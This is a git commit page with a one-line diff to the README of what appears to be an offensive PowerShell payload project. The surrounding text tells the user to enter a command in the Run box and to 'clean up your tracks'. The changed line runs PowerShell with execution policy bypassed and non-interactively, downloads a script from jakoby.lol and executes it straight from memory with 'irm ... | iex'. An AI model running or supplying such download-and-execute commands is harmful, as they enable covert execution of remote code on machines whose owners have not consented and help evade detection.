Update ReadMe.md
This commit is contained in:
parent
4f3587553a
commit
e05ae050f3
1 changed files with 1 additions and 1 deletions
|
@ -38,7 +38,7 @@ Lastly, to clean up your tracks behind you, the tmp folder will be emptied and t
|
|||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||
* Place your images URL in the $url variable
|
||||
```
|
||||
powershell -noexit -NoP -NonI -Exec Bypass $url='URL-HERE';iwr jakoby.lol/pkw | iex
|
||||
powershell -noexit -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
|
Loading…
Reference in a new issue